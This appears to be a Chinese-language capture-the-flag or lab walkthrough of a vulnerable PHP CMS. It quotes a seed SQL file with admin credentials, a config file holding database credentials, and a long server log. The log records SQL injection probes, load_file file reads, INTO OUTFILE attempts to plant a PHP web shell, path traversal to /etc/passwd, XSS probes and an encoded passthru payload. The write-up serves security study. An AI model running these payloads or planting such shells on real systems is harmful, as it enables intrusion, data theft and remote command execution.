INSERT INTO user SET user_id = 1, user_username='admin', user_password=md5('adminpass');

INSERT INTO event SET event_title='Mauris Vel', event_body='
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer pharetra nulla a velit euismod aliquam. Suspendisse potenti. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Duis eu felis a velit sollicitudin ullamcorper quis et sapien. Proin lacinia, mauris euismod pulvinar iaculis, elit dolor interdum ipsum, eu iaculis leo nisi sit amet enim. Phasellus nunc augue, commodo sed eleifend in, ullamcorper a sapien. Phasellus non posuere massa. Morbi sed posuere urna. Donec tincidunt congue ipsum nec vehicula. Nullam quis nulla erat. Phasellus semper pretium magna at faucibus. Pellentesque sed enim nec dui posuere blandit.</p>
<p>Maecenas malesuada blandit mauris vel tincidunt. Praesent vitae nibh erat. Donec tincidunt blandit aliquam. Donec pulvinar suscipit viverra. Fusce vitae diam non orci adipiscing dapibus nec in tortor. Donec laoreet feugiat adipiscing. Fusce at augue dignissim mauris tincidunt tincidunt. Sed at odio ut nisi vehicula porttitor. Quisque elementum ligula et libero hendrerit lacinia ac vel eros. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Suspendisse ut magna sem, eget pellentesque turpis. Nam ut velit ac lorem fringilla dapibus sit amet vitae leo. Mauris non velit eu neque auctor dignissim. Nam quis ipsum ac lectus commodo adipiscing interdum placerat mi.</p>',
user_id = (SELECT user_id from user where user_username = 'admin');


INSERT INTO event SET event_title='Proin velit lacus', event_body='<p>Proin velit lacus, eleifend id ullamcorper sit amet, mattis id velit. Suspendisse placerat, mi luctus feugiat lacinia, elit odio facilisis dolor, at pellentesque turpis felis tincidunt leo. Quisque quis leo dolor. Donec id nunc ut tortor posuere dictum. Aliquam lobortis auctor neque, sit amet ornare urna ultrices eu. Nunc gravida, lacus id condimentum commodo, lectus enim ultricies tellus, sit amet tempor urna augue a sem. Vestibulum pretium congue nibh ut imperdiet. Fusce ac nibh vel felis vestibulum porttitor. Praesent mattis velit a ipsum aliquam vel commodo libero porttitor. Morbi volutpat, justo nec lobortis accumsan, urna ligula malesuada tellus, pharetra vehicula massa magna ut nulla. Fusce luctus tempor pharetra. In hac habitasse platea dictumst. Etiam in neque pretium mi molestie fringilla. Etiam aliquam accumsan lorem vitae varius. </p>',
user_id = (SELECT user_id from user where user_username = 'admin');

INSERT INTO event SET event_title='Praesent magna est', event_body='<p>Praesent magna est, semper vitae euismod vitae, scelerisque eu nunc. Proin sed nibh a nisl tempus fringilla vitae ac nunc. Maecenas diam ipsum, ultrices vel faucibus non, suscipit nec felis. Praesent eleifend turpis vel orci sollicitudin quis tincidunt ante dapibus. Mauris laoreet mi vel nunc lacinia nec pulvinar lectus congue. Praesent imperdiet sollicitudin urna, sit amet auctor magna eleifend vel. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus elementum, magna vel venenatis pellentesque, nibh orci sollicitudin sapien, in tempor sem orci non metus. Nulla interdum feugiat ultrices. Nam egestas nulla quis dolor aliquam a iaculis arcu lobortis. Vestibulum urna leo, condimentum varius porttitor sed, tincidunt id est. Suspendisse potenti. Nulla fringilla massa ac arcu tempor molestie. Vivamus vehicula aliquet enim, eu porttitor libero suscipit non. </p>',
user_id = (SELECT user_id from user where user_username = 'admin');

INSERT INTO event SET event_title='Suspendisse sapien orci', event_body='<p>Suspendisse sapien orci, luctus laoreet fringilla vitae, sodales non quam. Aliquam vel justo vel enim dapibus ullamcorper. Sed elementum lacus sed tortor imperdiet imperdiet. Maecenas a turpis vel tellus iaculis ullamcorper. Pellentesque vitae orci at dolor vestibulum pharetra sit amet ut sem. Donec nec rhoncus ligula. Suspendisse eget luctus nunc. Nam eget arcu augue, vitae condimentum magna. Etiam et fermentum erat. Fusce vehicula urna ac nisl imperdiet fringilla blandit ut quam. Nullam ultricies eros sit amet sem volutpat eget elementum augue consequat. Integer non arcu orci, in iaculis elit. Fusce eros massa, accumsan in blandit eget, suscipit sit amet nibh. Vestibulum a neque libero. Vivamus purus augue, sollicitudin eget sagittis sed, lacinia sit amet nibh. Nulla eget suscipit libero. </p>',
user_id = (SELECT user_id from user where user_username = 'admin');

/sql目录下有个db.sql文件，看上去像是创建网站数据时的操作，仔细看一下发现里面甚至有用户的登陆凭证：admin:adminpass。
观察一下数据库构建语句很明显是网站主页登录框的登录凭证。我们尝试登录，发现能成功登录，但是不知道为啥提示登陆成功后并不能正常跳转到管理后台，只会跳回主页。。。。
那这个凭证尝试登录目录发现发现的邮箱登录，phpmyadmin登录，都失败，看来没有密码复用，先找找别的路吧。

我们在/docs目录下发现了code_backup.tgz压缩文件，很有可能是网站的代码备份。

我们下载下来看看。
OK，果然是，舒服。

我们进入conf目录，发现config.ini文件

;
; This is the configuration file
;
database_host	=	localhost
database_pass	=	45kkald?8laLKD
database_user	=	cms_user
database_db	=	cms

明显是连接数据库用的登录凭证 。
我们尝试用其登录phpmyadmin，果然成功。

我们看看这个账号对数据库的管理权限，发现除了grant权限，其他全有，基本约等于root了，那就方便我们接下来的操作了。
但是先别急，我们刚才网站的各个目录还没看完，并且之前手动尝试访问/logs目录时提示要密码，那我们就看看里面有什么东西。我们移动到/logs目录下，发现log.log日志文件。

2009-06-23 16:06:42	172.16.18.1 called 
2009-06-23 16:06:44	172.16.18.1 called action=logs
2009-06-23 16:06:50	172.16.18.1 called 
2009-06-23 16:06:52	172.16.18.1 called action=logs
2009-06-23 16:06:33	172.16.18.1 called 
2009-06-23 16:06:35	172.16.18.1 called id=4
2009-06-23 16:06:37	172.16.18.1 called action=users
2009-06-23 16:06:38	172.16.18.1 called action=logs
2009-06-23 20:06:18	172.16.18.1 called 
2009-06-23 20:06:46	172.16.18.1 called action=login
2009-06-23 20:06:50	172.16.18.1 called action=login
2009-06-23 20:06:45	172.16.18.1 called 
2009-06-23 20:06:17	172.16.18.1 called 
2009-06-23 20:06:26	172.16.18.1 called 
2009-06-23 20:06:50	172.16.18.1 called 
2009-06-23 20:06:57	172.16.18.1 called 
2009-06-23 20:06:51	172.16.18.1 called 
2009-06-23 20:06:38	172.16.18.1 called 
2009-06-23 20:06:51	172.16.18.1 called 
2009-06-23 20:06:55	172.16.18.1 called 
2009-06-23 20:06:29	172.16.18.1 called 
2009-06-23 20:06:32	172.16.18.1 called id=4
2009-06-23 20:06:34	172.16.18.1 called 
2009-06-24 17:06:36	172.16.61.1 called 
2009-06-24 17:06:45	172.16.61.1 called 
2009-06-24 17:06:17	172.16.61.1 called 
2009-06-24 17:06:31	172.16.61.1 called 
2009-06-24 17:06:37	172.16.61.1 called 
2009-06-24 17:06:16	172.16.61.1 called 
2009-06-24 17:06:36	172.16.61.1 called 
2009-06-24 17:06:49	172.16.61.1 called 
2009-06-24 17:06:35	172.16.61.1 called 
2009-06-28 13:06:09	172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1%20from%20dual
2009-06-28 13:06:09	Problem with event select: . The used SELECT statements have a different number of columns
2009-06-28 13:06:28	172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1,1%20from%20dual
2009-06-28 13:06:29	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:29	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:43	172.16.61.132 called id=4%20UNION%20select%20version,1,1,1,1,1,1%20from%20dual
2009-06-28 13:06:43	Problem with event select: . Unknown column 'version' in 'field list'
2009-06-28 13:06:52	172.16.61.132 called id=4%20UNION%20select%20version(),1,1,1,1,1,1%20from%20dual
2009-06-28 13:06:52	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:52	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:13	172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,7%20from%20dual
2009-06-28 13:06:13	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 1
2009-06-28 13:06:13	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 1
2009-06-28 13:06:30	172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,version()%20from%20dual
2009-06-28 13:06:30	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,version() from dual' at line 1
2009-06-28 13:06:30	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,version() from dual' at line 1
2009-06-28 13:06:54	172.16.61.132 called id=4%20UNION%20select%201,host,user,4,5,6,version()%20from%20dual
2009-06-28 13:06:54	Problem with event select: . Unknown column 'host' in 'field list'
2009-06-28 13:06:58	172.16.61.132 called id=4%20UNION%20select%201,host(),user(),4,5,6,version()%20from%20dual
2009-06-28 13:06:58	Problem with event select: . FUNCTION cms.host does not exist
2009-06-28 13:06:02	172.16.61.132 called id=4%20UNION%20select%201,2,user(),4,5,6,version()%20from%20dual
2009-06-28 13:06:02	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,user(),4,5,6,version() from dual' at line 1
2009-06-28 13:06:02	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,user(),4,5,6,version() from dual' at line 1
2009-06-28 13:06:35	172.16.61.132 called id=4%20UNION%20select%201,host(),user(),4,5,6,version()%20from%20dual
2009-06-28 13:06:35	Problem with event select: . FUNCTION cms.host does not exist
2009-06-28 13:06:41	172.16.61.132 called id=4%20UNION%20select%201,database(),user(),4,5,6,version()%20from%20dual
2009-06-28 13:06:41	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,database(),user(),4,5,6,version() from dual' at line 1
2009-06-28 13:06:41	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,database(),user(),4,5,6,version() from dual' at line 1
2009-06-28 13:06:23	172.16.61.132 called id=4%20UNION%20select%201,schema(),system_user(),4,5,6,version()%20from%20dual
2009-06-28 13:06:23	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,schema(),system_user(),4,5,6,version() from dual' at line 1
2009-06-28 13:06:23	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,schema(),system_user(),4,5,6,version() from dual' at line 1
2009-06-28 13:06:53	172.16.61.132 called id=4%20UNION%20select%201,\!%20ls%20/var/www/html,system_user(),4,5,6,version()%20from%20dual
2009-06-28 13:06:53	Problem with event select: . You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\! ls /var/www/html,system_user(),4,5,6,version() from dual' at line 5
2009-06-28 13:06:44	172.16.61.132 called id=4%20UNION%20select%201,system(%27ls%20/var/www/html%27),system_user(),4,5,6,version()%20from%20dual
2009-06-28 13:06:44	Problem with event select: . FUNCTION cms.system does not exist
2009-06-28 13:06:13	172.16.61.132 called id=4%20UNION%20select%201,system%20%27ls%20/var/www/html%27,system_user(),4,5,6,version()%20from%20dual
2009-06-28 13:06:13	Problem with event select: . Unknown column 'system' in 'field list'
2009-06-28 13:06:18	172.16.61.132 called id=4%20UNION%20select%201,system%20ls%20/var/www/html,system_user(),4,5,6,version()%20from%20dual
2009-06-28 13:06:18	Problem with event select: . You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/var/www/html,system_user(),4,5,6,version() from dual' at line 5
2009-06-28 13:06:48	172.16.61.132 called id=4%20UNION%20select%201,system%20%27ls%20/var/www/html%27,system_user(),4,5,6,version()%20from%20dual
2009-06-28 13:06:48	Problem with event select: . Unknown column 'system' in 'field list'
2009-06-28 13:06:39	172.16.61.132 called id=4%20UNION%20select%201,concat(2,%20system%20%27ls%20/var/www/html%27),system_user(),4,5,6,version()%20from%20dual
2009-06-28 13:06:39	Problem with event select: . You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ls /var/www/html'),system_user(),4,5,6,version() from dual' at line 5
2009-06-28 13:06:24	172.16.61.132 called id=4%20UNION%20select%201,cload_file(%27/var/www/html%27),system_user(),4,5,6,version()%20from%20dual
2009-06-28 13:06:24	Problem with event select: . FUNCTION cms.cload_file does not exist
2009-06-28 13:06:31	172.16.61.132 called id=4%20UNION%20select%201,cload_file(%27/var/www/html/index.php%27),system_user(),4,5,6,version()%20from%20dual
2009-06-28 13:06:31	Problem with event select: . FUNCTION cms.cload_file does not exist
2009-06-28 13:06:26	172.16.61.132 called id=4%20UNION%20select%201,load_file(%27/var/www/html/index.php%27),system_user(),4,5,6,version()%20from%20dual
2009-06-28 13:06:26	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,load_file('/var/www/html/index.php'),system_user(),4,5,6,version(' at line 1
2009-06-28 13:06:26	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,load_file('/var/www/html/index.php'),system_user(),4,5,6,version(' at line 1
2009-06-28 14:06:08	172.16.61.132 called id=4%20UNION%20select%201,load_file(%27/var/www/html/index.php%27),system_user(),4,5,6,version()%20from%20dual
2009-06-28 14:06:08	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,load_file('/var/www/html/index.php'),system_user(),4,5,6,version(' at line 1
2009-06-28 14:06:08	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,load_file('/var/www/html/index.php'),system_user(),4,5,6,version(' at line 1
2009-06-28 14:06:57	172.16.61.132 called id=4%20UNION%20select%201,load_file(%27/var/www/html/actions/loginphp%27),system_user(),4,5,6,version()%20from%20dual
2009-06-28 14:06:57	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,load_file('/var/www/html/actions/loginphp'),system_user(),4,5,6,v' at line 1
2009-06-28 14:06:57	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,load_file('/var/www/html/actions/loginphp'),system_user(),4,5,6,v' at line 1
2009-06-28 14:06:09	172.16.61.132 called id=4%20UNION%20select%201,load_file(%27/var/www/html/actions/login.php%27),system_user(),4,5,6,version()%20from%20dual
2009-06-28 14:06:09	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,load_file('/var/www/html/actions/login.php'),system_user(),4,5,6,' at line 1
2009-06-28 14:06:09	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,load_file('/var/www/html/actions/login.php'),system_user(),4,5,6,' at line 1
2009-06-28 14:06:22	172.16.61.132 called id=4%20UNION%20select%201,%27%3C?php%20system($_GET[%27cmd%27]);?%3E,system_user(),4,5,6,version()%20into%20outfile(%27/tmp/x.php%27)
2009-06-28 14:06:22	Problem with event select: . You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '']);?>,system_user(),4,5,6,version() into outfile('/tmp/x.php')' at line 5
2009-06-28 14:06:07	172.16.61.132 called id=4%20UNION%20select%201,%27%3C?php%20system($_GET[\%27cmd\%27]);?%3E,system_user(),4,5,6,version()%20into%20outfile(%27/tmp/x.php%27)
2009-06-28 14:06:07	Problem with event select: . You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 5
2009-06-28 14:06:20	172.16.61.132 called id=4%20UNION%20select%201,%27%3C?php%20system($_GET[\%27cmd\%27]);?%3E%27,3,4,5,6,7%20into%20outfile(%27/tmp/x.php%27)
2009-06-28 14:06:20	Problem with event select: . You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '('/tmp/x.php')' at line 5
2009-06-28 14:06:00	172.16.61.132 called id=4%20UNION%20select%201,%27%3C?php%20system($_GET[\%27cmd\%27]);?%3E%27,3,4,5,6,7%20into%20outfile%20%27/tmp/x.php%27
2009-06-28 14:06:19	172.16.61.132 called id=4%20UNION%20select%201,%27%3C?php%20system($_POST[\%27cmd\%27]);?%3E%27,3,4,5,6,7%20into%20outfile%20%27/tmp/x.php%27
2009-06-28 14:06:19	Problem with event select: . File '/tmp/x.php' already exists
2009-06-28 14:06:29	172.16.61.132 called id=4%20UNION%20select%201,%27%3C?php%20system($_POST[\%27cmd\%27]);?%3E%27,3,4,5,6,7%20into%20outfile%20%27/tmp/x.php%27
2009-06-28 14:06:29	Problem with event select: . File '/tmp/x.php' already exists
2009-06-28 14:06:41	172.16.61.132 called id=4%20UNION%20select%201,%27%3C?php%20system($_POST[\%27cmd\%27]);?%3E%27,3,4,5,6,7%20into%20outfile%20%27/tmp/y.php%27
2009-06-28 14:06:02	172.16.61.132 called id=4%20UNION%20select%201,%27%3C?php%20system($_POST[\%27cmd\%27]);?%3E%27,3,4,5,6,7%20into%20outfile%20%27/tmp/x.php%27
2009-06-28 14:06:02	Problem with event select: . File '/tmp/x.php' already exists
2009-06-28 15:06:02	172.16.61.132 called 
2009-06-28 15:06:12	172.16.61.132 called id=4
2009-06-28 15:06:27	172.16.61.132 called id=4%27
2009-06-28 15:06:27	Problem with event select: . You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 5
2009-06-28 15:06:03	172.16.61.132 called id=4%20UNION%20select%201%20from%20dual
2009-06-28 15:06:03	Problem with event select: . The used SELECT statements have a different number of columns
2009-06-28 15:06:57	172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,7%20from%20dual
2009-06-28 15:06:57	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 1
2009-06-28 15:06:57	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 1
2009-06-28 15:06:03	172.16.61.132 called id=4%20UNION%20select%201,database(),user(),4,5,6,version()%20from%20dual
2009-06-28 15:06:03	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,database(),user(),4,5,6,version() from dual' at line 1
2009-06-28 15:06:03	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,database(),user(),4,5,6,version() from dual' at line 1
2009-06-28 15:06:12	172.16.61.132 called id=4%20UNION%20select%201,load_file(%27/var/www/html/index.php%27),3,4,5,6,7%20from%20dual
2009-06-28 15:06:12	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,load_file('/var/www/html/index.php'),3,4,5,6,7 from dual' at line 1
2009-06-28 15:06:12	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,load_file('/var/www/html/index.php'),3,4,5,6,7 from dual' at line 1
2009-06-28 16:06:22	172.16.61.132 called id=4%20UNION%20select%201,load_file(%27/var/www/html/actions/login.php%27),3,4,5,6,7%20from%20dual
2009-06-28 16:06:22	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,load_file('/var/www/html/actions/login.php'),3,4,5,6,7 from dual' at line 1
2009-06-28 16:06:22	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,load_file('/var/www/html/actions/login.php'),3,4,5,6,7 from dual' at line 1
2009-06-28 16:06:18	172.16.61.132 called actions/login.php?action=../conf/config.ini%00
2009-06-28 18:06:13	172.16.61.132 called actions/login.php?action=../conf/config.ini%00
2009-06-28 18:06:15	172.16.61.132 called id=4%20UNION%20select%201,load_file(%27/var/www/html/actions/login.php%27),3,4,5,6,7%20from%20dual
2009-06-28 18:06:15	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,load_file('/var/www/html/actions/login.php'),3,4,5,6,7 from dual' at line 1
2009-06-28 18:06:15	Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,load_file('/var/www/html/actions/login.php'),3,4,5,6,7 from dual' at line 1
2009-06-28 18:06:23	172.16.61.132 called id=4%20UNION%20select%20NULL,NULL,NULL,NULL,NULL,NULL,%27%3C?php%20echo%20system($_POST[\%27cmd\%27]);?%3E%27%20INTO%20OUTFILE(%27/tmp/008st7845.php%27)
2009-06-28 18:06:23	Problem with event select: . You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '('/tmp/008st7845.php')' at line 5
2009-06-28 18:06:06	172.16.61.132 called id=4%20UNION%20select%20NULL,NULL,NULL,NULL,NULL,NULL,%27%3C?php%20echo%20system($_POST[\%27cmd\%27]);?%3E%27%20INTO%20OUTFILE%20%27/tmp/008st7845.php%27
2009-06-29 16:06:51	172.16.61.132 called 
2009-06-29 16:06:51	172.16.61.132 called 
2009-06-29 16:06:51	172.16.61.132 called 
2009-06-29 16:06:51	172.16.61.132 called 
2009-06-29 16:06:52	172.16.61.132 called 
2009-06-29 16:06:52	172.16.61.132 called 
2009-06-29 16:06:52	172.16.61.132 called 
2009-06-29 16:06:52	172.16.61.132 called 
2009-06-29 16:06:52	172.16.61.132 called 
2009-06-29 16:06:52	172.16.61.132 called 
2009-06-29 16:06:52	172.16.61.132 called chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
2009-06-29 16:06:52	172.16.61.132 called 
2009-06-29 16:06:52	172.16.61.132 called mod=node&nid=some_thing&op=view
2009-06-29 16:06:52	172.16.61.132 called mod=some_thing&op=browse
2009-06-29 16:06:52	172.16.61.132 called file=index.php
2009-06-29 16:06:52	172.16.61.132 called 
2009-06-29 16:06:52	172.16.61.132 called 
2009-06-29 16:06:52	172.16.61.132 called 
2009-06-29 16:06:52	172.16.61.132 called Open
2009-06-29 16:06:52	172.16.61.132 called OpenServer
2009-06-29 16:06:52	172.16.61.132 called 
2009-06-29 16:06:53	172.16.61.132 called 
2009-06-29 16:06:53	172.16.61.132 called 
2009-06-29 16:06:53	172.16.61.132 called 
2009-06-29 16:06:53	172.16.61.132 called 
2009-06-29 16:06:53	172.16.61.132 called 
2009-06-29 16:06:53	172.16.61.132 called download=/winnt/win.ini
2009-06-29 16:06:53	172.16.61.132 called download=/windows/win.ini
2009-06-29 16:06:53	172.16.61.132 called download=/etc/passwd
2009-06-29 16:06:54	172.16.61.132 called |=../../../../../../../../../etc/passwd
2009-06-29 16:06:54	172.16.61.132 called page=../../../../../../../../../../etc/passwd
2009-06-29 16:06:54	172.16.61.132 called page=../../../../../../../../../../boot.ini
2009-06-29 16:06:54	172.16.61.132 called l=forum/view.php&topic=../../../../../../../../../etc/passwd
2009-06-29 16:06:54	172.16.61.132 called module=My_eGallery
2009-06-29 16:06:54	172.16.61.132 called option=search&searchword=<script>alert(document.cookie);</script>
2009-06-29 16:06:54	172.16.61.132 called dir=<script>alert('Vulnerable')</script>
2009-06-29 16:06:55	172.16.61.132 called top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
2009-06-29 16:06:55	172.16.61.132 called file=Liens&op=\"><script>alert('Vulnerable');</script>
2009-06-29 16:06:55	172.16.61.132 called catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
2009-06-29 16:06:55	172.16.61.132 called action=storenew&username=<script>alert('Vulnerable')</script>
2009-06-29 16:06:55	172.16.61.132 called action=search&searchFor=\"><script>alert('Vulnerable')</script
2009-06-29 16:06:55	172.16.61.132 called 
2009-06-29 16:06:55	172.16.61.132 called SectionID=3&SearchText=<script>alert(document.cookie)</script>
2009-06-29 16:06:55	172.16.61.132 called SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search
2009-06-29 16:06:55	172.16.61.132 called mod=<script>alert(document.cookie)</script>&op=browse
2009-06-29 16:06:55	172.16.61.132 called sql_debug=1
2009-06-29 16:06:55	172.16.61.132 called sql_debug=1
2009-06-29 16:06:56	172.16.61.132 called 
2009-06-29 16:06:56	172.16.61.132 called rep=<script>alert(document.cookie)</script>
2009-06-29 16:06:56	172.16.61.132 called 
2009-06-29 16:06:56	172.16.61.132 called 
2009-06-29 16:06:57	172.16.61.132 called module=ew_filemanager&type=admin&func=manager&pathext=../../../etc
2009-06-29 16:06:57	172.16.61.132 called module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
2009-06-29 16:06:57	172.16.61.132 called err=3&email=\"><script>alert(document.cookie)</script>
2009-06-29 16:06:57	172.16.61.132 called name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
2009-06-29 16:06:57	172.16.61.132 called name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
2009-06-29 16:06:57	172.16.61.132 called name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
2009-06-29 16:06:57	172.16.61.132 called name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
2009-06-29 16:06:57	172.16.61.132 called name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
2009-06-29 16:06:57	172.16.61.132 called name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
2009-06-29 16:06:57	172.16.61.132 called name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
2009-06-29 16:06:57	172.16.61.132 called name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
2009-06-29 16:06:57	172.16.61.132 called name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
2009-06-29 16:06:58	172.16.61.132 called PageServices
2009-06-29 16:06:58	172.16.61.132 called wp-cs-dump
2009-06-29 16:06:58	172.16.61.132 called 
2009-06-29 16:06:58	172.16.61.132 called 
2009-06-29 16:06:58	172.16.61.132 called 
2009-06-29 16:06:58	172.16.61.132 called 
2009-06-29 16:06:58	172.16.61.132 called 
2009-06-29 16:06:58	172.16.61.132 called 
2009-06-29 16:06:58	172.16.61.132 called 
2009-06-29 16:06:58	172.16.61.132 called 
2009-06-29 16:06:59	172.16.61.132 called 
2009-06-29 16:06:59	172.16.61.132 called 
2009-06-29 16:06:59	172.16.61.132 called 
2009-06-29 16:06:59	172.16.61.132 called 
2009-06-29 16:06:59	172.16.61.132 called 
2009-06-29 16:06:59	172.16.61.132 called 
2009-06-29 16:06:59	172.16.61.132 called 
2009-06-29 16:06:59	172.16.61.132 called 
2009-06-29 16:06:59	172.16.61.132 called 
2009-06-29 16:06:59	172.16.61.132 called 
2009-06-29 16:06:59	172.16.61.132 called 
2009-06-29 16:06:00	172.16.61.132 called 
2009-06-29 16:06:00	172.16.61.132 called 
2009-06-29 16:06:00	172.16.61.132 called 
2009-06-29 16:06:00	172.16.61.132 called 
2009-06-29 16:06:00	172.16.61.132 called 
2009-06-29 16:06:00	172.16.61.132 called 
2009-06-29 16:06:00	172.16.61.132 called vo=\"><script>alert(document.cookie);</script>
2009-06-29 16:06:00	172.16.61.132 called showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]
2009-06-29 16:06:00	172.16.61.132 called offset=[%20Problem%20Here%20]
2009-06-29 16:06:02	172.16.61.132 called base=test%20
2009-06-29 16:06:03	172.16.61.132 called IDAdmin=test
